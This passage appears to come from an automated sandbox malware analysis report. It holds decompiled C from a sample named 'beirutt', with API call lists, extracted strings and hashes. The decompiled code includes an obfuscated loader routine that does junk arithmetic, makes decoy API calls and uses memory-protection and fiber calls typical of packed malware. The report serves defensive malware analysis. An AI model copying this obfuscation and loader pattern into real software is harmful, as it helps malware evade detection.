						 *((intOrPtr*)(_t548 + 0x20)) = 0x2778b6dc;
						 *((intOrPtr*)(_t548 + 0x9c)) = 0x85452b6;
						 *((intOrPtr*)(_t548 + 0xb8)) = 0x1218ed1d;
						 *((intOrPtr*)(_t548 + 0x104)) = 0xd9b6b2;
						 *((intOrPtr*)(_t548 + 0x6c)) = 0x60ed2d02;
						 *((intOrPtr*)(_t548 + 0x48)) = 0x7c8f244;
						 *((intOrPtr*)(_t548 + 0xd4)) = 0x7c68a916;
						 *((intOrPtr*)(_t548 + 0x58)) = 0x4024e11b;
						 *((intOrPtr*)(_t548 + 0x94)) = 0x31a67be2;
						 *((intOrPtr*)(_t548 + 0x98)) = 0x38a010b8;
						 *((intOrPtr*)(_t548 + 0x70)) = 0x65cd6bcb;
						 *((intOrPtr*)(_t548 + 0x64)) = 0xd5e2e41;
						 *(_t548 + 0x18) = 0x32b94cf3;
						 *((intOrPtr*)(_t548 + 0xc0)) = 0x440dbe79;
						 *((intOrPtr*)(_t548 + 0x30)) = 0x7f07bca8;
						 *((intOrPtr*)(_t548 + 0xfc)) = 0x2d97c075;
						 *((intOrPtr*)(_t548 + 0x80)) = 0x47c6e660;
						 *(_t548 + 0x108) = 0x124d600e;
						 *((intOrPtr*)(_t548 + 0x2c)) = 0x7c5bd6b8;
						 *((intOrPtr*)(_t548 + 0x5c)) = 0x720f4388;
						 *((intOrPtr*)(_t548 + 0x68)) = 0x66f44b2a;
						 *((intOrPtr*)(_t548 + 0x24)) = 0x6121e946;
						 *((intOrPtr*)(_t548 + 0x90)) = 0x2eb26c41;
						 *((intOrPtr*)(_t548 + 0xd0)) = 0x4095ff9e;
						 *((intOrPtr*)(_t548 + 0xe8)) = 0x14e054b;
						 *((intOrPtr*)(_t548 + 0x8c)) = 0x6069fb2d;
						 *((intOrPtr*)(_t548 + 0x100)) = 0x7c2f03fa;
						 *((intOrPtr*)(_t548 + 0xa0)) = 0x608f30c7;
						 *((intOrPtr*)(_t548 + 0xac)) = 0x7089a0e6;
						 *((intOrPtr*)(_t548 + 0x84)) = 0x14fa71ed;
						 *((intOrPtr*)(_t548 + 0x54)) = 0x7335f813;
						 *((intOrPtr*)(_t548 + 0x50)) = 0x52e1e39b;
						 *((intOrPtr*)(_t548 + 0xc4)) = 0xe3b047;
						 *((intOrPtr*)(_t548 + 0x14)) = 0x18913c83;
						 *((intOrPtr*)(_t548 + 0xec)) = 0x42e1409b;
						 *((intOrPtr*)(_t548 + 0x88)) = 0x5e35fc82;
						 *((intOrPtr*)(_t548 + 0xc8)) = 0x1e0f0e7;
						 *((intOrPtr*)(_t548 + 0x3c)) = 0x5dffc54d;
						 *((intOrPtr*)(_t548 + 0xf0)) = 0x4d7a1719;
						 *((intOrPtr*)(_t548 + 0x34)) = 0x23eecbd0;
						 *((intOrPtr*)(_t548 + 0x4c)) = 0x4ed76024;
						 *((intOrPtr*)(_t548 + 0xd8)) = 0x532f8005;
						 *((intOrPtr*)(_t548 + 0xbc)) = 0x39a7d51a;
						 *((intOrPtr*)(_t548 + 0xe0)) = 0x52a099c1;
						 *((intOrPtr*)(_t548 + 0xe4)) = 0x19e73f09;
						 *((intOrPtr*)(_t548 + 0x28)) = 0x7fc81313;
						 *((intOrPtr*)(_t548 + 0x74)) = 0x4cb0a940;
						 *((intOrPtr*)(_t548 + 0xb0)) = 0x53fddb72;
						 *((intOrPtr*)(_t548 + 0x78)) = 0x2d4b305d;
						 *((intOrPtr*)(_t548 + 0x7c)) = 0x67b61bf8;
						 *((intOrPtr*)(_t548 + 0xf8)) = 0x62b90dba;
						 *((intOrPtr*)(_t548 + 0xf4)) = 0x158ce4a0;
						 *((intOrPtr*)(_t548 + 0xb4)) = 0xb0c24fc;
						 *((intOrPtr*)(_t548 + 0x40)) = 0x394c2a2a;
						 *((intOrPtr*)(_t548 + 0xa4)) = 0x1a556e59;
						 *((intOrPtr*)(_t548 + 0xa8)) = 0x55486f1d;
						 *((intOrPtr*)(_t548 + 0x60)) = 0x288b4760;
						 *((intOrPtr*)(_t548 + 0xdc)) = 0x7fb3b9be;
						 *((intOrPtr*)(_t548 + 0xcc)) = 0x7b3ce4b8;
						 *((intOrPtr*)(_t548 + 0x38)) =  *((intOrPtr*)(_t548 + 0x38)) + 0x30b15d6a;
						 *((intOrPtr*)(_t548 + 0x38)) =  *((intOrPtr*)(_t548 + 0x38)) - 0x1d35e926;
						 *((intOrPtr*)(_t548 + 0x38)) =  *((intOrPtr*)(_t548 + 0x38)) - 0x6e753ef1;
						 *((intOrPtr*)(_t548 + 0x38)) =  *((intOrPtr*)(_t548 + 0x38)) + 0x492f88c5;
						 *((intOrPtr*)(_t548 + 0xb8)) =  *((intOrPtr*)(_t548 + 0xb8)) + 0x26664f41;
						 *((intOrPtr*)(_t548 + 0x9c)) =  *((intOrPtr*)(_t548 + 0x9c)) - 0x24e4062d;
						 *((intOrPtr*)(_t548 + 0x48)) =  *((intOrPtr*)(_t548 + 0x48)) + 0x52c41bce;
						 *((intOrPtr*)(_t548 + 0x48)) =  *((intOrPtr*)(_t548 + 0x48)) + 0x3ffe67c8;
						 *((intOrPtr*)(_t548 + 0x20)) =  *((intOrPtr*)(_t548 + 0x20)) - 0x258b7ac8;
						 *((intOrPtr*)(_t548 + 0xb8)) =  *((intOrPtr*)(_t548 + 0xb8)) - 0x40a681d2;
						 *((intOrPtr*)(_t548 + 0x9c)) =  *((intOrPtr*)(_t548 + 0x9c)) + 0x589f5e6b;
						 *((intOrPtr*)(_t548 + 0x104)) =  *((intOrPtr*)(_t548 + 0x104)) + 0x1b3c9988;
						 *((intOrPtr*)(_t548 + 0x64)) =  *((intOrPtr*)(_t548 + 0x64)) - 0x271459e2;
						 *((intOrPtr*)(_t548 + 0x64)) =  *((intOrPtr*)(_t548 + 0x64)) + 0x6e672dd2;
						 *((intOrPtr*)(_t548 + 0xd4)) =  *((intOrPtr*)(_t548 + 0xd4)) + 0x6983ccb2;
						 *((intOrPtr*)(_t548 + 0x30)) =  *((intOrPtr*)(_t548 + 0x30)) + 0x710e337b;
						 *((intOrPtr*)(_t548 + 0x44)) =  *((intOrPtr*)(_t548 + 0x44)) - 0x610070a5;
						 *((intOrPtr*)(_t548 + 0x44)) =  *((intOrPtr*)(_t548 + 0x44)) + 0x2f8248e;
						 *((intOrPtr*)(_t548 + 0x94)) =  *((intOrPtr*)(_t548 + 0x94)) - 0x50d52fcc;
						 *((intOrPtr*)(_t548 + 0xb8)) =  *((intOrPtr*)(_t548 + 0xb8)) + 0x3b1f3428;
						 *((intOrPtr*)(_t548 + 0x64)) =  *((intOrPtr*)(_t548 + 0x64)) + 0x20d2cc78;
						 *((intOrPtr*)(_t548 + 0x104)) =  *((intOrPtr*)(_t548 + 0x104)) + 0x58f9ea7b;
						 *((intOrPtr*)(_t548 + 0x2c)) =  *((intOrPtr*)(_t548 + 0x2c)) - 0x58302607;
						 *((intOrPtr*)(_t548 + 0x98)) =  *((intOrPtr*)(_t548 + 0x98)) + 0x56c44812;
						 *((intOrPtr*)(_t548 + 0x64)) =  *((intOrPtr*)(_t548 + 0x64)) + 0x2c83140d;
						 *((intOrPtr*)(_t548 + 0x38)) =  *((intOrPtr*)(_t548 + 0x38)) - 0x4a3f4800;
						 *((intOrPtr*)(_t548 + 0x90)) =  *((intOrPtr*)(_t548 + 0x90)) + 0x36525615;
						 *((intOrPtr*)(_t548 + 0x48)) =  *((intOrPtr*)(_t548 + 0x48)) + 0x27eccd5d;
						 *((intOrPtr*)(_t548 + 0xd4)) =  *((intOrPtr*)(_t548 + 0xd4)) + 0x169a029a;
						 *((intOrPtr*)(_t548 + 0x90)) =  *((intOrPtr*)(_t548 + 0x90)) - 0x31943e69;
						 *((intOrPtr*)(_t548 + 0x84)) =  *((intOrPtr*)(_t548 + 0x84)) + 0x310e125d;
						 *((intOrPtr*)(_t548 + 0xb8)) =  *((intOrPtr*)(_t548 + 0xb8)) - 0xd2320b3;
						 *((intOrPtr*)(_t548 + 0x50)) =  *((intOrPtr*)(_t548 + 0x50)) - 0x533699d9;
						 *((intOrPtr*)(_t548 + 0x44)) =  *((intOrPtr*)(_t548 + 0x44)) + 0x6d624fde;
						 *((intOrPtr*)(_t548 + 0x14)) =  *((intOrPtr*)(_t548 + 0x14)) + 0x7dc19d83;
						 *((intOrPtr*)(_t548 + 0x80)) =  *((intOrPtr*)(_t548 + 0x80)) + 0x74dcf020;
						 *((intOrPtr*)(_t548 + 0x38)) =  *((intOrPtr*)(_t548 + 0x38)) + 0x642c6016;
						 *((intOrPtr*)(_t548 + 0x68)) =  *((intOrPtr*)(_t548 + 0x68)) + 0x5f8ad935;
						 *((intOrPtr*)(_t548 + 0x44)) =  *((intOrPtr*)(_t548 + 0x44)) - 0x3ad7f61b;
						 *((intOrPtr*)(_t548 + 0x38)) =  *((intOrPtr*)(_t548 + 0x38)) + 0x210c976e;
						 *(_t548 + 0x108) =  *(_t548 + 0x108) + 0x947f16c;
						 *((intOrPtr*)(_t548 + 0xec)) =  *((intOrPtr*)(_t548 + 0xec)) + 0x667a2a09;
						 *((intOrPtr*)(_t548 + 0x34)) =  *((intOrPtr*)(_t548 + 0x34)) + 0x4f2af32;
						 *((intOrPtr*)(_t548 + 0xf0)) =  *((intOrPtr*)(_t548 + 0xf0)) - 0x1fec65db;
						 *((intOrPtr*)(_t548 + 0x28)) =  *((intOrPtr*)(_t548 + 0x28)) - 0x6283507;
						 *((intOrPtr*)(_t548 + 0x24)) =  *((intOrPtr*)(_t548 + 0x24)) + 0x6fdc274b;
						 *((intOrPtr*)(_t548 + 0x68)) =  *((intOrPtr*)(_t548 + 0x68)) + 0x78d847fc;
					}
					__imp__GetGeoInfoW(0, 0, 0, 0, 0); // executed
					if(_t535 > 0x2422fd) {
						break;
					}
					_t535 = _t535 + 1;
					if(_t535 < 0x15a21ef4) {
						continue;
					}
					break;
				}
				E00403150();
				_t499 = 0;
				do {
					if(_t499 == 0xbde) {
						E004031CB(_t499);
					}
					_t499 = _t499 + 1;
				} while (_t499 < 0x409495);
				_t536 = 0x7b;
				do {
					if( *0x42a074 == 0x86) {
						AddAtomW(L"Ritonojuza melujom bet wuhaxe kosogup");
						BackupEventLogW(0, 0);
						GetCharWidthA(0, 0, 0, 0);
					}
					if( *0x42a074 == 0xf) {
						lstrcmpiW(0, 0);
						CreateEventA(0, 0, 0, 0);
						__imp__EnumCalendarInfoExA(0, 0, 0, 0);
					}
					_t536 = _t536 - 1;
				} while (_t536 != 0);
				_t544 = 0x184cc;
				do {
					if( *0x42a074 == 0x1833b) {
						GetConsoleCursorInfo(0, _t548 + 0x108);
						__imp__GetSystemWindowsDirectoryA(0, 0);
						SetLastError(0);
						GetComputerNameA(0, 0);
						EnumSystemCodePagesA(0, 0);
						 *((short*)(_t548 + 0x14)) = 0;
						asm("stosw");
						ReadConsoleOutputCharacterA(0, 0, 0,  *(_t548 + 0x18), _t548 + 0x18);
						__imp__GetVolumeNameForVolumeMountPointW(0, 0, 0);
					}
					_t544 = _t544 - 1;
				} while (_t544 != 0);
				_t390 = LoadLibraryW(L"msimg32.dll");
				E004031E5();
				 *[fs:0x0] =  *((intOrPtr*)(_t548 + 0x934));
				return _t390;
			}

0x004031f1
0x004031f6
0x004031fb
0x00403209
0x0040320c
0x00403215
0x0040321d
0x00403224
0x0040322b
0x00403230
0x00403232
0x00403238
0x0040323a
0x0040323c
0x0040323f
0x00403244
0x00403247
0x00403247
0x0040324c
0x0040326a
0x0040326f
0x00403282
0x00403288
0x0040328e
0x00403296
0x00403298
0x004032aa
0x004032b7
0x004032bc
0x004032bc
0x004032c2
0x004032c3
0x00403298
0x004032cb
0x004032cd
0x004032d7
0x004032dc
0x004032ed
0x00403300
0x0040330f
0x0040331a
0x00403325
0x00403325
0x0040332b
0x0040332c
0x0040333a
0x0040333c
0x0040333e
0x00403345
0x00403349
0x00403355
0x0040335b
0x00403363
0x0040336b
0x00403373
0x0040337e
0x00403389
0x00403394
0x0040339c
0x004033a4
0x004033af
0x004033b7
0x004033c2
0x004033cd
0x004033d5
0x004033dd
0x004033e5
0x004033f0
0x004033f8
0x00403403
0x0040340e
0x00403419
0x00403421
0x00403429
0x00403431
0x00403439
0x00403444
0x0040344f
0x0040345a
0x00403465
0x00403470
0x0040347b
0x00403486
0x00403491
0x00403499
0x004034a1
0x004034ac
0x004034b4
0x004034bf
0x004034ca
0x004034d5
0x004034dd
0x004034e8
0x004034f0
0x004034f8
0x00403503
0x0040350e
0x00403519
0x00403524
0x0040352c
0x00403534
0x0040353f
0x00403547
0x0040354f
0x0040355a
0x00403565
0x00403570
0x00403578
0x00403583
0x0040358e
0x00403596
0x004035a1
0x004035ac
0x004035b4
0x004035bc
0x004035de
0x004035e6
0x004035f1
0x0040360f
0x00403617
0x00403632
0x00403654
0x0040365f
0x0040367d
0x004036c1
0x004036c9
0x004036d1
0x004036ef
0x004036f7
0x004036ff
0x00403707
0x0040371f
0x00403737
0x00403792
0x0040379d
0x004037a5
0x004037b0
0x004037b8
0x004037c0
0x004037de
0x004037e6
0x0040381e
0x00403836
0x00403841
0x0040384c
0x00403854
0x0040385c
0x00403864
0x0040386f
0x0040388a
0x00403892
0x0040389a
0x004038a2
0x004038ad
0x004038b8
0x004038c0
0x004038cb
0x004038e6
0x0040391b
0x0040391b
0x00403928
0x00403934
0x00000000
0x00000000
0x00403936
0x0040393d
0x00000000
0x00000000
0x00000000
0x0040393d
0x00403943
0x00403948
0x0040394a
0x00403950
0x00403952
0x00403952
0x00403957
0x00403958
0x00403962
0x00403963
0x0040396d
0x00403974
0x0040397c
0x00403986
0x00403986
0x00403993
0x00403997
0x004039a1
0x004039ab
0x004039ab
0x004039b1
0x004039b1
0x004039b4
0x004039b9
0x004039c3
0x004039ce
0x004039d6
0x004039dd
0x004039e1
0x004039e9
0x004039f1
0x004039fa
0x00403a08
0x00403a11
0x00403a11
0x00403a17
0x00403a17
0x00403a1f
0x00403a25
0x00403a34
0x00403a3d

APIs

__EH_prolog.LIBCMT ref: 004031F6
LoadLibraryW.KERNEL32(kernel32.dll,000004F3,00000000), ref: 0040325B
GlobalAlloc.KERNELBASE(00000000), ref: 0040326F
VirtualProtect.KERNELBASE(00000000,00000040,?), ref: 00403288
HeapSize.KERNEL32(00000000,00000000,00000000), ref: 004032BC
CreateFiber.KERNEL32(00000000,00000000,00000000), ref: 004032DC
GetConsoleAliasA.KERNEL32(00000000,?,00000000,00000000), ref: 004032ED
LCMapStringA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 00403300
GetCPInfo.KERNEL32(00000000,?), ref: 0040330F
GetNamedPipeInfo.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0040331A
lstrlenA.KERNEL32(nusarifubanuwedike), ref: 00403325
GetCommMask.KERNELBASE(00000000,00000000), ref: 0040333E
SetLastError.KERNEL32(00000000), ref: 00403345
GetConsoleProcessList.KERNEL32(00000000,00000000), ref: 00403349

Part of subcall function 00403EF1: __wcstoi64.LIBCMT ref: 00403EFD

Part of subcall function 00402F85: _fabs.LIBCMT ref: 00402F97

Part of subcall function 00404261: _doexit.LIBCMT ref: 0040426D

GetGeoInfoW.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 00403928
AddAtomW.KERNEL32(Ritonojuza melujom bet wuhaxe kosogup), ref: 00403974
BackupEventLogW.ADVAPI32(00000000,00000000), ref: 0040397C
GetCharWidthA.GDI32(00000000,00000000,00000000,00000000), ref: 00403986
lstrcmpiW.KERNEL32(00000000,00000000), ref: 00403997
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004039A1
EnumCalendarInfoExA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004039AB
GetConsoleCursorInfo.KERNEL32(00000000,?), ref: 004039CE
GetSystemWindowsDirectoryA.KERNEL32 ref: 004039D6
SetLastError.KERNEL32(00000000), ref: 004039DD
GetComputerNameA.KERNEL32 ref: 004039E1
EnumSystemCodePagesA.KERNEL32(00000000,00000000), ref: 004039E9
ReadConsoleOutputCharacterA.KERNEL32(00000000,00000000,00000000,?,?), ref: 00403A08
GetVolumeNameForVolumeMountPointW.KERNEL32(00000000,00000000,00000000), ref: 00403A11
LoadLibraryW.KERNEL32(msimg32.dll), ref: 00403A1F

Strings

*zf, xrefs: 004038AD
kernel32.dll, xrefs: 00403256
A.^, xrefs: 004033D5
]0K-, xrefs: 0040353F
F!a, xrefs: 00403431
AOf&, xrefs: 004035E6
O#t, xrefs: 00403647
nusarifubanuwedike, xrefs: 00403320
C>u, xrefs: 004037F1
msimg32.dll, xrefs: 00403A1A
;A;, xrefs: 0040366A
**L9, xrefs: 00403570
Ritonojuza melujom bet wuhaxe kosogup, xrefs: 0040396F

Memory Dump Source

Source File: 00000007.00000002.572696263.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.572660674.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.572866987.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.572886161.0000000000412000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.573058769.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.573105153.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_beirutt.jbxd

Similarity

API ID: Info$Console$CreateEnumErrorEventLastLibraryLoadNameSystemVolume$AliasAllocAtomBackupCalendarCharCharacterCodeCommComputerCursorDirectoryFiberGlobalH_prologHeapListMaskMountNamedOutputPagesPipePointProcessProtectReadSizeStringVirtualWidthWindows__wcstoi64_doexit_fabslstrcmpilstrlen
String ID: *zf$**L9$;A;$A.^$AOf&$C>u$F!a$O#t$Ritonojuza melujom bet wuhaxe kosogup$]0K-$kernel32.dll$msimg32.dll$nusarifubanuwedike
API String ID: 2244824987-168902230
Opcode ID: a78ab3d43ac104fa84ad30749ad1fa933683e50de89da52b65f6e5139a55e6da
Instruction ID: 4003c42c541a518063b13526db9ce83d5467668d21756c401ecc02e598c96725
Opcode Fuzzy Hash: a78ab3d43ac104fa84ad30749ad1fa933683e50de89da52b65f6e5139a55e6da
Instruction Fuzzy Hash: 7A1244B4609380DFC3708F66DA89A8FBBE8FF85754F40491DF589A6620C7348985CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 00407D5C Relevance: 4.5, APIs: 3, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00407D5C() {
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t1;
				void* _t5;
				void* _t18;
				WCHAR* _t20;

				_t1 = GetEnvironmentStringsW();
				_t20 = _t1;
				if(_t20 != 0) {
					if( *_t20 != 0) {
						goto L3;
						do {
							do {
								L3:
								_t1 =  &(_t1[1]);
							} while ( *_t1 != 0);
							_t1 =  &(_t1[1]);
						} while ( *_t1 != 0);
					}
					_t13 = _t1 - _t20 + 2;
					_t5 = E00405A47(_t1 - _t20 + 2); // executed
					_t18 = _t5;
					if(_t18 != 0) {
						E00405FF0(_t13, _t18, _t20, _t18, _t20, _t13);
					}
					FreeEnvironmentStringsW(_t20);
					return _t18;
				} else {
					return 0;
				}
			}

0x00407d5f
0x00407d65
0x00407d6b
0x00407d74
0x00000000
0x00407d76
0x00407d76
0x00407d76
0x00407d77
0x00407d78
0x00407d7e
0x00407d7f
0x00407d76
0x00407d89
0x00407d8d
0x00407d92
0x00407d97
0x00407da9
0x00407dae
0x00407d9a
0x00407da5
0x00407d6d
0x00407d70
0x00407d70

APIs

GetEnvironmentStringsW.KERNEL32(00000000,004043DB), ref: 00407D5F
__malloc_crt.LIBCMT ref: 00407D8D
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00407D9A

Memory Dump Source

Source File: 00000007.00000002.572696263.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.572660674.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.572866987.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.572886161.0000000000412000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.573058769.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.573105153.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_beirutt.jbxd

Similarity

API ID: EnvironmentStrings$Free__malloc_crt
String ID:
API String ID: 237123855-0
Opcode ID: e7374a414d6545ba43566110602700d7ee34a1674da5f4f962c4fce07a96182f
Instruction ID: 4f5e4a2862ad6b444b5e9d2171f24e5384be0d4486c07ffbd7e6430ec36edcce
Opcode Fuzzy Hash: e7374a414d6545ba43566110602700d7ee34a1674da5f4f962c4fce07a96182f
Instruction Fuzzy Hash: DEF0E936E084615DCA2477346C48C771168DECB329315443BF492E3281F53C5D4386AA

Uniqueness

Uniqueness Score: -1.00%

Function 004044FE Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004044FE(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x427f60 = _t6;
				if(_t6 != 0) {
					 *0x42a204 = 1;
					return 1;
				} else {
					return _t6;
				}
			}

0x00404513
0x00404519
0x00404520
0x00404527
0x0040452d
0x00404523
0x00404523
0x00404523

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00404513

Memory Dump Source

Source File: 00000007.00000002.572696263.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.572660674.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.572866987.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.572886161.0000000000412000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.573058769.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.573105153.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_beirutt.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: ff1c66c52a04cbe30a3fd9e9c72441683f72f3456e9a7db937e9b7c4c5065141
Instruction ID: 1a86d43c29583a7408539714b52951096af4b7171c1a4eea3d32d5bc7f9ffbe4
Opcode Fuzzy Hash: ff1c66c52a04cbe30a3fd9e9c72441683f72f3456e9a7db937e9b7c4c5065141
Instruction Fuzzy Hash: BED05E76654349ABEB205F70AE08B263BDCD384395F148436B91CC6690E674C951C518

Uniqueness

Uniqueness Score: -1.00%

Function 0040551C Relevance: 1.5, APIs: 1, Instructions: 4
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040551C() {
				void* _t1;

				_t1 = E004054AA(0); // executed
				return _t1;
			}

0x0040551e
0x00405524

APIs

__encode_pointer.LIBCMT ref: 0040551E

Part of subcall function 004054AA: TlsGetValue.KERNEL32(00000000,?,00405523,00000000,0040A2F2,004280E0,00000000,00000314,?,004072DF,004280E0,Microsoft Visual C++ Runtime Library,00012010), ref: 004054BC
Part of subcall function 004054AA: TlsGetValue.KERNEL32(00000005,?,00405523,00000000,0040A2F2,004280E0,00000000,00000314,?,004072DF,004280E0,Microsoft Visual C++ Runtime Library,00012010), ref: 004054D3
Part of subcall function 004054AA: RtlEncodePointer.NTDLL(00000000,?,00405523,00000000,0040A2F2,004280E0,00000000,00000314,?,004072DF,004280E0,Microsoft Visual C++ Runtime Library,00012010), ref: 00405511

Memory Dump Source

Source File: 00000007.00000002.572696263.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.572660674.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.572866987.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.572886161.0000000000412000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.573058769.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.573105153.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_beirutt.jbxd

Similarity

API ID: Value$EncodePointer__encode_pointer
String ID:
API String ID: 2585649348-0
Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction ID: 86b571a9b96b0d94e5ded10f78d386089ba382789a63d470fe2ff7ce67bff6c6
Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00408415 Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E00408415(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x411520; // 0xc4defe65
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x428798 = _t6;
				 *0x428794 = _t22;
				 *0x428790 = _t25;
				 *0x42878c = _t21;
				 *0x428788 = _t27;
				 *0x428784 = _t26;
				 *0x4287b0 = ss;
				 *0x4287a4 = cs;
				 *0x428780 = ds;
				 *0x42877c = es;
				 *0x428778 = fs;
				 *0x428774 = gs;
				asm("pushfd");
				_pop( *0x4287a8);
				 *0x42879c =  *_t31;
				 *0x4287a0 = _v0;
				 *0x4287ac =  &_a4;
				 *0x4286e8 = 0x10001;
				_t11 =  *0x4287a0; // 0x0
				 *0x42869c = _t11;
				 *0x428690 = 0xc0000409;
				 *0x428694 = 1;
				_t12 =  *0x411520; // 0xc4defe65
				_v812 = _t12;
				_t13 =  *0x411524; // 0x3b21019a
				_v808 = _t13;
				 *0x4286e0 = IsDebuggerPresent();
				_push(1);
				E004095D9(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x401ba0);
				if( *0x4286e0 == 0) {
					_push(1);
					E004095D9(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x00408415
0x00408415
0x00408415
0x00408415
0x00408415
0x00408415
0x00408415
0x0040841b
0x0040841d
0x0040841d
0x0040a911
0x0040a916
0x0040a91c
0x0040a922
0x0040a928
0x0040a92e
0x0040a934
0x0040a93b
0x0040a942
0x0040a949
0x0040a950
0x0040a957
0x0040a95e
0x0040a95f
0x0040a968
0x0040a970
0x0040a978
0x0040a983
0x0040a98d
0x0040a992
0x0040a997
0x0040a9a1
0x0040a9ab
0x0040a9b0
0x0040a9b6
0x0040a9bb
0x0040a9c7
0x0040a9cc
0x0040a9ce
0x0040a9d6
0x0040a9e1
0x0040a9ee
0x0040a9f0
0x0040a9f2
0x0040a9f7
0x0040aa0b

APIs

IsDebuggerPresent.KERNEL32 ref: 0040A9C1
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040A9D6
UnhandledExceptionFilter.KERNEL32(00401BA0), ref: 0040A9E1
GetCurrentProcess.KERNEL32(C0000409), ref: 0040A9FD
TerminateProcess.KERNEL32(00000000), ref: 0040AA04

Memory Dump Source

Source File: 00000007.00000002.572696263.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.572660674.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.572866987.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.572886161.0000000000412000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.573058769.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.573105153.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_beirutt.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: cfcdb9561fd247f2d1843975dddb2fcf3be9946c430c65e56b7a04f7941c33c1
Instruction ID: 9c80669769a07546686c9512a235e016006c353ce42bea70bc549afb5cf9ff73
Opcode Fuzzy Hash: cfcdb9561fd247f2d1843975dddb2fcf3be9946c430c65e56b7a04f7941c33c1
Instruction Fuzzy Hash: 5D21DFB9A02304DFD761DF25ED456483BA0FB98341FA0513EE609972B0EBB45982CF0D

Uniqueness

Uniqueness Score: -1.00%

Function 0040E6F7 Relevance: 9.0, APIs: 6, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

